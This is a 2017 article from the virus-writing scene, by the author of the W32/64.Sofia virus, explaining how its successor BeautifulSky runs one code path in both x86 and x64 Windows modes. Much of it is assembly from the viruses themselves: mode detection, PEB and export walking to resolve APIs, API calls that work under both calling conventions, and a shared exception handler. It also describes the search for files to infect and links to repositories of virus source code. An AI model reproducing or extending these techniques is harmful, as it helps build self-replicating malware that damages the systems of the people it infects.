_ _ ___ __ __ _____ ___ ___ _ _ _ _ | |_ | |_ ( _ ) / / / / |_ _| __/ __| | /_\ | | __ _| |__ ___ | ' \| ' \/ _ \/ _ \ / / | | | _|\__ \ |__ / _ \ | |__/ _` | '_ (_-< |_||_|_||_\___/\___/ /_/ |_| |___|___/____/_/ \_\ |____\__,_|_.__/__/ presents... .*. *' + '* , , *'|'* |`;`;`;`| | |:.'.'.'| | |:.:.:.:| | |::....:| | /` / ` \ | ( .' ^ \^) |_., ( \ -/( ,~`| `~./ )._=/ ) ,, { | ( )| (.~` `~, { | \ _.' \ ) } ; | ;`\ `)-` } _.._ '.(\, ; `\ / `. }__.-'__.-' An analysis of W32/64.Sofia ( (/-;~~`; `\_/ ; .'` _.-' and the new BEAUTIFULSKY code base `/|\/ .'\. /o\ ,`~~`~~~~` \| ` .' \'--' '-` |--',==~~`) (`~~==,_ jgs ,=~` `-. / `~=, ,=` `-._/ `=, 21/12/2017 fsendjinn@gmail.com Intro Some years ago, I wrote my first cross-platform code which I named Sofia. This was primarily a Proof of Concept virus demonstrating how to mix x86 and x64 assembly. Most of it consisted of detecting the execution mode coupled with conditional statements that allowed it to run platform compatible code when needed. I *almost* achieved to create the world's first cross-platform virus code that had a single execution path. Today, I want to review Sofia, and analyse the core techniques I thought and implemented, and compare them with a successor code base I named BeautifulSky. This article is a standalone, and don't need to have access to the source code of both viruses to be understandable, but knowledge of x86/x64 assembly and W32/W64 is needed. BeautifulSky Before Sofia was created, the virus writer roy g biv had published an article in 2009 detailing a new technique he called Heaven's Gate. This short article showed how to execute x64 code in a WoW64 (32-bit) process. His PoC virus W32/64.Heaven further demonstrated this feature of WoW64, and together with his W32/64.Shrug virus, inspired me to write Sofia. Heaven only used its technique to jump into 64-bit mode therefore much of its code was x64 using a native interface (NTDLL API). Shrug48 stuck together a x86 and a x64 version of itself. Sofia was an attempt to make something like Shrug48, but more compact. Now almost in 2018 with new operating systems in the Windows family, and the introduction of new protections in Windows 10, Heaven's Gate is no longer available so easily anymore for usermode. What we now know is that it's entirely possible to write a single x86/x64 assembly code which can run in both 32-bit/64-bit mode by using carefully chosen encoding, a common API set, and the basic arithmetic we all know. Besides, 6 years later since Sofia, the infosec scene has picked a trend to make double-words codenames for fancy projects. This is a fancy project and I needed a fancy name, so I named it after a song by Masayoshi Minoshima. ______ | ___ \ | | | |_/ / _____ ____ _ _ __ ___| | | ___ \/ _ \ \ /\ / / _` | '__/ _ \ | | |_/ / __/\ V V / (_| | | | __/_| \____/ \___| \_/\_/ \__,_|_| \___(_) there could be Dragons, dense text and x64/x86 assembly code! What's new in BeautifulSky? – uses the same code to run in both x86/x64 modes, single execution path – fully x86/x64 compatible encoding – no self-modifying code to achieve compatibility – position independent-code and compatible with Address Space Layout Randomization – uses Process Environment Block (PEB) to get kernel32/ntdll directly on both platforms – stdcall/x64 calling convention compatible – own GetProcAddress() that supports PE32/PE32+ – uses CRC32 instead of name strings – uses Vectored Exception Handler for common exception handling on both platforms and still there is much more. :) BeautifulSky searches the current directory for any file (e.g find mask *.*). To open and map files for infection it uses an adapted and more efficient version of a technique used by W32.Cabanas virus by Jacky Qwerty in 1998. The code, unlike Sofia's, was written in pure x86 code in good old masm32. The reason behind this is that it is easier to visualize what the code looks like in both x86/64. It feels more natural for people to look at x86 assembly code like this where prefixes are visible, and the dual-mode execution can be seen clearly. In the text we will find that Sofia's code is x64, BeautifulSky will be x86, and examples will be sometimes provided with code for both modes. _____ _ _ _ _ | _ | | | | (_) (_) | | | | |__ | |_ __ _ _ _ __ _ _ __ __ _ | | | | '_ \| __|/ _` | | '_ \| | '_ \ / _` | \ \_/ / |_) | |_| (_| | | | | | | | | | (_| | \___/|_.__/ \__|\__,_|_|_| |_|_|_| |_|\__, | __/ | |___/ the platform/mode First, the code needs a function to obtain the mode – x86/x64 – in which it's running. This will be helpful when deciding how to use memory access instructions which are compatible with 32/64-bit pointers, etc. Let's see that function from Sofia: x64: riprel: push rax 48 08 0D 00 00 00 00 lea rcx, qword ptr [rip] pop rax ret x86: riprel: push eax 48 dec eax 08 0D 00 00 00 00 lea ecx, dword ptr [0] pop eax ret The function in x64 mode has the effect of moving the current IP to RCX, but in x86 there is no equivalent instruction because EIP can't be used this way, thus the value of ECX becomes zero. So the function returns zero if x86, or non-zero if x64. Here we also learn about the first encoding difference, let's read a bit of Intel's documentation to learn more about it: "REX prefixes are a set of 16 opcodes that span one row of the opcode map and occupy entries 40H to 4FH. These opcodes represent valid instructions (INC or DEC) in IA-32 operating modes and in compatibility mode. In 64-bit mode, the same opcodes represent the instruction prefix REX and are not treated as individual instructions. The single-byte-opcode forms of the INC/DEC instructions are not available in 64-bit mode. INC/DEC functionality is still available using ModR/M forms of the same instructions (opcodes FF/0 and FF/1)" What we saw there as dec eax (opcode 48h) in x86, is a REX prefix in x64 that turns the addressing and registers to 64-bit. The implementation of the function in Sofia served the purpose of directing the flow of execution in a conditional way: “if this is x86 mode, then run x86 code for W32, else run x64 code for W64.” In BeautifulSky, I created a new function after learning the values of the CS segment register: 33h for W64, and different values for W32. This was a good starting point and I decided to make the function return 0, or 1. Just one bit to rule them all. ;) x86/x64: mov ecx, cs cmp ecx, 33h setz cl ret Later, I upgraded it to an architecture/platform-independent trick: xor eax, eax mov ecx, eax dec eax setz cl XOR sets ZF=1. In x86 DEC sets ZF=0, and SETZ sets CL=0. In x64 DEC is REX prefix, no effect; SETZ sets CL=1. But when qkumba saw my code, he made a smaller gem of detection code: xor ecx, ecx arpl cx, cx XOR sets ZF=1. ARPL instruction sets ZF=0 in x86. But here is the trick: in x64 mode, ARPL opcode was reassigned to the MOVSXD instruction that doesn't alter any flag, thus ZF=1. With SETZ to CL, we get the bit that we need. Of course, this code was too good not to use it. :) _____ _ _ _ _ | _ | | | | (_) (_) | | | | |__ | |_ __ _ _ _ __ _ _ __ __ _ | | | | '_ \| __|/ _` | | '_ \| | '_ \ / _` | \ \_/ / |_) | |_| (_| | | | | | | | | | (_| | \___/|_.__/ \__|\__,_|_|_| |_|_|_| |_|\__, | __/ | |___/ the Process Environment Block Both Sofia and BeautifulSky first attempt to obtain the PEB address for two tasks: get the image base of the host, and the pointer to PEB_LDR_DATA where the needed DLL's base addresses can be found to resolve API addresses. In the Thread Environment Block (TEB), the pointer to PEB is at offset 30h for W32, and 60h for W64. Now the most common way to get the PEB address is this: x86: 6a 30 push teb.peb 59 pop ecx 64 8b 31 mov esi, dword ptr fs:[ecx] x64: 6a 60 push teb.peb 59 pop rcx 65 48 8b 31 mov rsi, qword ptr gs:[rcx] The difference in encoding and platform is clear now: different segment register means different opcode, and there is a REX prefix because of the qword ptr [..]. I thought about how to solve this by adjusting the registers depending the mode. But we already have another problem, the REX prefix. If altered accordingly, in x86 it becomes 64 48 fs:dec eax. The problem is that for x86: fs loses effect since MOV becomes an instruction apart and might access invalid memory. We can't exchange places between prefixes to make it compatible both ways because in x64 that would cause the addressing to be 32-bit, since the REX prefix must go before the instruction opcodes to work. There are some solutions. One is to use a double prefix which looks like this: 64 64 8B 31 fs:fs:mov. It works for x86, and in x64 mode the first prefix must be adjusted to 65 gs, and the second to 48 dec eax, so it becomes 65 48 8B 31: x86 example: call l1 l1: pop edx call platform mov al, 64h mov byte ptr [edx + (offset selector2 - offset l1)], al add al, cl mov byte ptr [edx + (offset selector1 - offset l1)], al imul eax, ecx, 64h - 48h sub byte ptr [edx + (offset selector2 - offset l1)], al db 0ffh, 0c1h ;in x86 inc ecx, in x64 inc rcx imul esi, ecx, 30h selector1: db 64h ;in 32-bit mode becomes fs, in 64-bit mode becomes gs selector2: db 64h ;in 32-bit mode becomes fs, in 64-bit mode becomes REX mov ebx, dword ptr [esi] This is a weird solution, but it is useful if the code doesn't start executing via AddressOfEntryPoint. Now let's think a solution if execution does starts via AddressOfEntryPoint: In both W32/W64 platforms, EBX/RCX is the address to the PEB. So it wouldn't need to access the TEB and no segment registers! Just adjust the register according to the mode. x86 example: call l1 l1: pop edx push ecx call platform mov al, 53h ;push ebx sub al, cl sub al, cl ;in x64 edx is rdx mov byte ptr [edx + (offset switchreg - offset l1)], al imul edi, ecx, 8 pop ecx switchreg: push ecx ;in x86/x64 becomes ebx/ecx pop ebx What about achieving the same with no self-modifying code? We can use CMOVcc to do that, but not using our platform function (that alters ECX/RCX register, needed in x64 mode), we can do this instead: x86 example: xor eax, eax dec eax cmovns ebx, ecx And x64 looks like this: xor eax, eax cmovns rbx, rcx This trick is simple. EAX/RAX is set to 0, and this makes SF=0. In x86 mode dec eax sets SF=1. In x64, dec eax is REX prefix, thus EAX/RAX and SF are not altered. No move occurs in x86 mode, and in x64 RCX (PEB pointer) is now in RBX, making it both ways compatible. This solution eventually led me to think differently on how to solve the problem with the segment registers. Can we use CMOVcc and decide when to move from fs:[30h] or gs:[60h]? Yes, we can, let's do it: x86: push 60h pop edx xor eax, eax push eax dec eax cmovs ebx, dword ptr fs:[30h] cmovs edx, esp db 65h dec eax cmovns ebx, dword ptr [edx] First, the PEB's offset 60h in the W64's TEB is assigned to EDX/RDX. XOR sets SF=0. In x86 DEC sets SF=1, but in x64 DEC is a REX prefix. In x86 CMOVS sets EBX with the PEB address. But what happens in x64? The internal operation of CMOVcc is to fetch the SRC operand before the conditional occurs. This means that in x64 there is also a read to fs:[30h]. This is why I didn't use the bit mode to dynamically calculate the right offset to the PEB. However, the way this instruction is encoded with hardcoded 30h offset, in x64 makes it read a DWORD from RIP going through FS but works. If we would had calculated the offset in EDX/RDX and encoded it as fs:[edx]/fs:[rdx], it would've failed, assuming that at the time this code is executed, 60h is an invalid address. The next CMOVS, in x86 mode moves ESP to EDX. Notice that the instruction doesn't use the REX prefix, because it is only needed to take effect in x86 mode. The next CMOVNS is a little trickier, but we discussed this opcode arrangement before. We want to have the GS prefix before the REX. In x86 it will become gs:dec eax, and CMOVNS an instruction apart. In x64 it will become cmovns rbx, qword ptr [rdx]. This arrangement disables the read from gs:[60h] in x86, and we need to have a valid memory field in EDX that the CMOVNS can read, that's why only in x86 we moved ESP to EDX. In x64 moves the PEB address to RBX. This technique is currently used in BeautifulSky if the code does not starts by AddressOfEntryPoint, but it's a decision that must be made before compiling the code. / \ _ ) (( )) ( (@) /|\ ))_(( /|\ |-| / | \ (/\|/\) / | \ (@) | | -------------------/--|-voV---\`|'/--Vov-|--\---------------------|-| |-| '^` (o o) '^` | | | | `\Y/' |-| |-| Fun fact: contrary to popular opinion | | | | Dragons enjoy ice cream and secretly acquire it in large amounts |-| |-| specially banana with dulce de leche combo | | | | |-| |_|___________________________________________________________________| | (@) l /\ / ( ( \ /\ l `\|-| l / V \ \ V \ l (@) l/ _) )_ \I `\ /' Now let's see what the entry point code in Sofia looked like: sofia_push label near push 0deadbabeh call riprel jecxz go_peb32 ;here begins 64-bit part, not executed in 32-bit mode! push 60h pop rsi lods qword ptr gs:[rsi] mov rcx, qword ptr [rax + PROCESS_ENVIRONMENT_BLOCK_IMAGE_BASE + 8] add qword ptr [rsp], rcx ;convert RVA to VA ... jmp double_call ;here ends 64-bit part ;here begins 32-bit part, not executed in 64-bit mode! go_peb32 label near push 30h pop rsi lods dword ptr fs:[esi] mov eax, dword ptr [eax + PROCESS_ENVIRONMENT_BLOCK_IMAGE_BASE] add dword ptr [esp], eax ;convert RVA to VA There are two reasons why this code can't seem to be combined: 1) because of the segment registers problem; 2) because the offset to dwImageBaseAddress in PEB is 8 in W32, and 10h in W64. First, the RVA (AddressOfEntryPoint is an RVA and DWORD for both platforms) is pushed onto the stack. Next, call riprel, if x86, jump to x86 code... Now see one of the entry point codes in BeautifulSky: x86: push "6891" ;replaced by entrypoint push esi push ebp push edi push ebx push edx push ecx push eax xor eax, eax dec eax cmovns ebx, ecx call platform db 0ffh, 0c1h ;inc ecx imul esi, ecx, dword * 7 imul edx, ecx, PEB32.dwImageBaseAddress dec eax mov edx, dword ptr [ebx + edx] dec eax add dword ptr [esp + esi], edx x64 equivalent: push "6891" ;replaced by entrypoint push rsi push rbp push rdi push rbx push rdx push rcx push rax xor eax, eax cmovns rbx, rcx call platform db 0ffh, 0c1h ;inc ecx imul esi, ecx, dword * 7 imul edx, ecx, PEB32.dwImageBaseAddress mov rdx, qword ptr [rbx + rdx] add qword ptr [rsp + rsi], rdx Super different, isn't it? First, the RVA is pushed onto the stack, and then all registers that need to be preserved (remember there is no PUSHAD/POPAD instructions in x64). Next the registers are adjusted accordingly to have the PEB address in EBX/RBX. platform is called; and we increase ECX by 1, so 1 for x86, 2 for x64; multiply ECX by (dword * saved registers count), and store the result in ESI, now it has the offset to the RVA in the stack; multiply ECX by 8, and store the result in EDX, so 8 if x86, 10h in x64, now it has the offset to dwImageBaseAddress and it can now update the RVA. Finally, we are done with this part! In the case of the code that resolves kernel32 and ntdll's base address, the story is more of the same: divided code for Sofia because of difference in offsets; BeautifulSky calculates the offsets and the code is fully compatible, even simpler. _ _ _ _ _ ______ _ _ | | | | | | | (_) | _ \ | | | | | | | __ _| | | ___ _ __ __ _ | | | | | | | ___ | |/\| |/ _` | | |/ / | '_ \ / _` | | | | | | | | / __| \ /\ / (_| | | <| | | | | (_| | | |/ /| |____| |____\__ \ \/ \/ \__,_|_|_|\_\_|_| |_|\__, | |___/ \_____/\_____/|___/ __/ | |___/ If you have ever written code to parse a PE32 DLL and its export directory, you will be happy to know that RVAs continue to be 32-bit. Therefore the IMAGE_EXPORT_DIRECTORY and other structures continue to be the same for both PE32/PE32+. However, IMAGE_OPTIONAL_HEADER structure did change: BaseOfData field is gone, Imagebase and SizeOf*Reserve/SizeOf*Commit are 64-bit. As easy as it might be travelling from the DOS header to the Export Directory on a loaded DLL, I still managed to make one silly mistake in Sofia: push rax pop rdx add al, 78h call riprel jecxz l1 add al, IMAGE_OHDD64_EXPORT_TABLE - (IMAGE_DOS_HEADER.e_lfanew * 2) l1: add eax, dword ptr [rdx + IMAGE_DOS_HEADER.e_lfanew] mov ebp, dword ptr [rax] add rbp, rdx In the beginning EAX/RAX and EDX/RDX are set to the base address of the DLL, then adds to AL the offset of the Export Directory (from the beginning of the PE header). riprel is used to determinate the mode, so that it can further add to AL the difference of the offset between the PE32 and PE32+. Next, in both modes it adds the offset to the PE header. Now EAX/RAX is the pointer to Export Directory in the Data Directory. It moves the RVA to ebp and correctly adds the 64-bit base address of the DLL. The bug is located in the add eax, dword ptr [edx + 3ch] instruction. It is a 32-bit addition to the lower 32-bit section of the 64-bit register, this type of operation causes the upper 32-bit part to be zeroed in x64 mode. Let's see the path in x64 mode and the changes to RAX for more clarity: add al, 78h -> rax = 00000040-00000078 add al, 10h -> rax = 00000040-00000088 add eax, [edx + 3ch] -> rax = 00000000-00000xxx It would be safe to think that Sofia should have never worked in 64-bit mode then. But in his analysis of Sofia, Peter Ferrie states: "it just so happens that the image base of both of those DLLs is always in the low 2GB range, and thus the size of the image base never exceeds 32 bits. In the case of kernelbase.dll and a number of other introduced DLLs, on the other hand, the size of the image base does exceed 32 bits. If the virus had attempted to access any APIs from such a DLL, then the bug would have caused a crash." . . ~~//====...... __--~ ~~ -. \_|// |||\\ ~~~~~~::::... /~ ___-==_ _-~o~ \/ ||| \\ _/~~- __---~~~.==~||\=_ -_--~/_-~|- |\\ \\ _/~ _-~~ .=~ | \\-_ '-~7 /- / || \ / .~ .~ | \\ -_ / /- / || \ / / ____ / | \\ ~-_/ /|- _/ .|| \ / |~~ ~~|--~~~~--_ \ ~==-/ | \~--===~~ .\ ' ~-| /| |-~\~~ __--~~ |-~~-_/ | | ~\_ _-~ /\ / \ \__ \/~ \__ _--~ _/ | .-~~____--~-/ ~~==. ((->/~ '.|||' -_| ~~-/ , . _|| -_ ~\ ~~---l__i__i__i--~~_/ _-~-__ ~) \--______________--~~ //.-~~~-~_--~- |-------~~~~~~~~ //.-~~~--\ a Dragon! BeautifulSky code is almost the same, but offsets differences are calculated using the platform bit: call platform shl cl, 4 mov edx, dword ptr [ebp + IMAGE_DOS_HEADER.e_lfanew] add edx, ecx mov ebx, dword ptr [ebp + edx + IMAGE_EXPORT_DIRECTORY32] CL=0 in x86 mode, or CL=1 in x64. I use the RVA of the Export Directory differently: instead of having a pointer to IMAGE_EXPORT_DIRECTORY, we have EBX/RBX with the RVA and EBP/RBP with the base address of the DLL: mov ecx, dword ptr [ebp + ebx + IMAGE_EXPORT_DIRECTORY.AddressOfNames] dec eax add ecx, ebp That's it for resolving API addresses. Both codes are very similar. _____ _ _ _ ___ ______ _____ / __ \ | | (_) / _ \| ___ \_ _| | / \/ __ _| | |_ _ __ __ _ / /_\ \ |_/ / | | ___ | | / _` | | | | '_ \ / _` | | _ | __/ | | / __| | \__/\ (_| | | | | | | | (_| | | | | | | _| |_\__ \ \____/\__,_|_|_|_|_| |_|\__, | \_| |_|_| \___/|___/ __/ | |___/ Some of you might be wondering how we can call APIs in a compatible way when stdcall is entirely different from the x64 calling convention (x64CC). In x64CC, the four first parameters are placed in registers RCX/RDX/R8/R9 with the remainder stored on the stack. A shadow space (4 slots * QWORD) to store these registers is required on the stack even if the API doesn't have 4 parameters. The call must also be aligned to a 16-byte boundary in case the API uses SSE instructions. So, for example, a call to FindFirstFileW looks like this: Assuming the stack is aligned at this point, here is the W64 version: mov rdx, lpFindFileData mov rcx, lpFileName sub rsp, 20h + 8 call FindFirstFileW Shadow stack layout: offset data 18 r9 slot 10 r8 slot 8 rdx slot 0 rcx slot We still need one more slot, because the return address unaligns the stack. In offset 20h, we would have those 8 more bytes to align. One "sub rsp, 8" is equivalent to a PUSH operation in 64-bit mode. Thus it can be made compatible this way: mov rdx, lpFindFileData mov rcx, lpFileName sub rsp, 10h + 8 push rdx ;in x86 mode push lpFindFileData push rcx ;in x86 mode push lpFileName call FindFirstFileW Basically, in x86 mode the arguments will be taken from the stack, and in x64 mode from registers and the arguments for x86 are just shadow stack. :) Let's see how this happens in Sofia: push rsp pop rdi enter stack buffer size, 0 push rsp pop rsi push rsi pop rdx sub rsp, 18h push rsi ;in param2 push rcx ;in 32-bit param1 push kFindFirstFileA pop rax call call_apisize call qword ptr [rdi + rax] ;32/64-bit compatible CALL ... call_apisize proc push rcx call riprel jecxz addr_api32bit shl eax, 3 ;in 64-bit mode only pop rcx ret addr_api32bit label near ;in 32-bit mode only shl eax, 2 pop rcx ret call_apisize endp First, EDI/RDI becomes the stack-frame pointer for the API addresses list. A buffer is allocated for WIN32_FIND_DATA structure and the arguments are pushed to the stack as I described before. We can see that EAX/RAX will hold an index for kFindFirstFileA (index in the fashion of... 0, 1, 2...) that will be used to calculate the position of the address in the stack, and there is a call to call_apisize to calculate the offset. But before we move to describe the function, we can see a nice call qword ptr [...] that is compatible for both platforms. No prefix needed. call_apisize gets the index in EAX/RAX, and... if 32-bit mode, multiply by 4, else by 8. And now you can feel my disappointment. It is a simple as that. BeautifulSky doesn't improve too much on this front. It uses the API offsets from x86 mode instead of index: x86: ;we are here after getting APIs and they are in the stack now call skip_dyncall push ecx call platform shl eax, cl pop ecx jmp dword ptr [esi + eax] skip_dyncall label near push esp pop esi ;enter buffer and push args go here ... push dword + kernel32.kFindFirstFileW pop eax call dword ptr [esi] The new call_apisize takes the platform bit to makes a shift-left by 0 or 1 (same as multiplying by 2). Now it has the right offset and jumps to the API. When the API returns, it returns correctly after call dword ptr [esi]. Finding files is a loop, you might be wondering how we can make it to clean up the stack after every call when in x86 mode the API (or callee) cleans up the stack with "retn N" but in x64CC they do not. Could there be a chance for the loop to overflow the stack with the arguments for FindNextFileW? If the stack is small, or there is just too many files, it could happen. x86: test_dir label near ... call open_append ... push edi pop edx mov ecx, ebp push edx push ecx push dword + kernel32.kFindNextFileW pop eax call dword ptr [esi] xchg edx, eax call platform shl cl, 4 dec eax add esp, ecx test edx, edx jnz test_dir BeautifulSky does not release the shadow space used in FindFirstFileW call, because it can use two slots for FindNextFileW(). This API will add to new slots that must be released before we can loop again: the platform bit is shifted left to make it 10h only in x64, and add it to RSP and it's done. I included a new function in BeautifulSky to do the stack release for other cases. Sofia had the "if x86, release this much, else this much" type of code again. The new function is for convenience and future additions/alteration of the code. Now let's take for example, SetFileAttributesW that take only two arguments. x86: set_fileattr proc near lea ecx, dword ptr [edi + WIN32_FIND_DATAW.cFileName] push edx push edx push edx push ecx push dword + kernel32.kSetFileAttributesW pop eax call dword ptr [esi] push dword * 2 push qword * 4 - dword * 2 call release_stack ret set_fileattr endp release_stack proc near pop edx call platform pop eax imul ecx, eax pop eax add ecx, eax dec eax add esp, ecx jmp edx release_stack endp In x86 mode it needs to release 2 slots that belong to x64 mode. In x64 mode it needs to release the shadow space entirely. release_stack dynamically adjusts ESP/RSP and jumps back. _____ _ _ | ___| | | (_) | |____ __ ___ ___ _ __ | |_ _ ___ _ __ | __\ \/ // __|/ _ \ '_ \| __| |/ _ \| '_ \ | |___> <| (__| __/ |_) | |_| | (_) | | | | \____/_/\_\\___|\___| .__/ \__|_|\___/|_| |_| | | |_| Handling with VEH for W32/W64 SEH isn't available in W64 in the same way. It became a table in the image that describes where the protected code begins and where it ends, describes the stack and registers, etc. It also has a pointer to the exception handler for that code. It is possible to use APIs to use this table, but it is not compatible with W32. When I made Sofia I also took the opportunity to create W64/Haley which uses this table for an EntryPoint Obscuring technique. The solution instead is to use Vectored Exception Handlers that is API based, and it works in both platforms Sofia: call infect_file ;vectored handler begins here infect_file: pop rcx ;return address is handler address push rcx pop rdx push rcx ;in 32-bit arg2 push rdx ;in 32-bit arg1 push ntRtlAddVectoredExceptionHandler pop rax call call_apisize call qword ptr [rdi + rax] ;push regs to save here mov rdx, rsp ;save in compatible register both modes This is how I still do it today. You can see the stack-frame is set and registers are saved, specifically those that must survive an exception of catastrophic proportions, specially if we didn't intend to cause it. :) Here is the entry point of the Vectored Handler in Sofia: push rcx call riprel jecxz vehfix_call32 ;here begins 64-bit part, not executed in 32-bit mode! pop rcx mov rax, qword ptr [rcx + POINTER_CONTEXT_RECORD64] add rax, 7fh call vehfix_regs64 jmp remove_veh ;here ends 64-bit part ;here begins 32-bit part, not executed in 64-bit mode! vehfix_call32: pop rcx mov eax, dword ptr [esp + POINTER_CONTEXT_RECORD32] add eax, 7fh call vehfix_regs32 ;here ends 32bit part The handler is divided and for a "good reason". In W64, RCX is ExceptionInfo, a pointer to the EXCEPTION_POINTERS struct. In W32 the pointer is sent via the stack. Interesting problem back then. Lets see how I solved it this time: pop edx ;return pop eax ;ExceptionInfo in x86 push ebx push eax pop ebx xor eax, eax dec eax cmovns ebx, ecx The trick is: in both modes it makes a pop of what should be ExceptionInfo: in x86 mode it is, but in x64 mode poped the first slot in the shadow stack. And we make use of the CMOVcc trick again. Now the correct pointer is in RBX. The second part to this is that it needs to make a "retn 4" operation in x86 mode but not in x64. The return address is safe in EDX/RDX, and the pointer is out of the stack already with the pop eax. In x64 however, we have to undo that pop before we go back. Lets see the second part of the handler in Sofia: vehfix_regs32 proc ;in 32-bit mode only pop qword ptr [rax + CONTEXT_EIP - 7fh] push qword ptr [rax + CONTEXT_EDX - 7fh] ;ESP is lost pop qword ptr [rax + CONTEXT_ESP - 7fh] jmp return_veh vehfix_regs32 endp vehfix_regs64 proc ;in 64-bit mode only pop qword ptr [rax + CONTEXT_RIP - 7fh] push qword ptr [rax + CONTEXT_RDX - 7fh] ;RSP is lost pop qword ptr [rax + CONTEXT_RSP - 7fh] ;both 32-bit and 64-bit modes return_veh label near or eax, EXCEPTION_CONTINUE_EXECUTION ret vehfix_regs64 endp I mentioned in the source code "VEH fixer must be separated", because offsets of the registers in CONTEXT structure are different for W32/W64. It is worth to mention that pop dword ptr is encoded the same as pop qword ptr, so they are compatible for this case. call unmap_newip ;make eip/rip point here and execution continues unmap_newip: call platform dec eax mov ebx, dword ptr [ecx * EXCEPTION_POINTERS.ContextRecord + ebx + EXCEPTION_POINTERS.ContextRecord] imul eax, ecx, CONTEXT_RIP - CONTEXT_EIP pop dword ptr [ebx + eax + CONTEXT_EIP] pop ebx shl ecx, 3 ;make a qword dec eax sub esp, ecx ;fake a push or eax, EXCEPTION_CONTINUE_EXECUTION jmp edx Using previous tricks, the offset to EIP/RIP in CONTEXT is calculated and EIP/RIP adjusted to a safe continuation point where execution will be resumed. Finally the pop eax is fixed and jumps back to ntdll. You might be wondering why BeautifulSky's VEH does not restore ESP/RSP unlike Sofia's VEH. Basically, my idea was to make whatever piece of code that came next, not using EDX/RDX, thus no need to restore it. A small detail worth mentioning: EDX is at a higher offset than its RDX counterpart in the CONTEXT structure. That needs some further calculation and more code. Okay, so after all, it was possible to make a compatible Vectored Exception Handler code. :) ____ _ / __ \ | | | | | |_ _| |_ _ __ ___ | | | | | | | __| '__/ _ \ | |__| | |_| | |_| | | (_) | \____/ \__,_|\__|_| \___/ We reviewed all the main points where code was amended and made into a single execution path for BeautifulSky. If I had been able to achieve it 6 years ago, I think these days I would regret that I did it. I would like to send greetings and thank modexp and qkumba for their help with writing this text. It was the hardest part. ;) _ _ _ | | (_) | | | | _ _ __ | | _____ | | | | '_ \| |/ / __| | |____| | | | | <\__ \ |______|_|_| |_|_|\_\___/ W32/W64.Sofia: https://github.com/rehh86/Room/tree/master/Sofia W32/W64.Heaven: https://github.com/rehh86/defjam/tree/master/Heaven W32/W64.Shrug: https://github.com/rehh86/defjam/tree/master/Shrug48 Analysis by Peter Ferrie: Sofia: http://pferrie.host22.com/papers/amfibee.pdf Heaven: http://pferrie.host22.com/papers/sobelow.pdf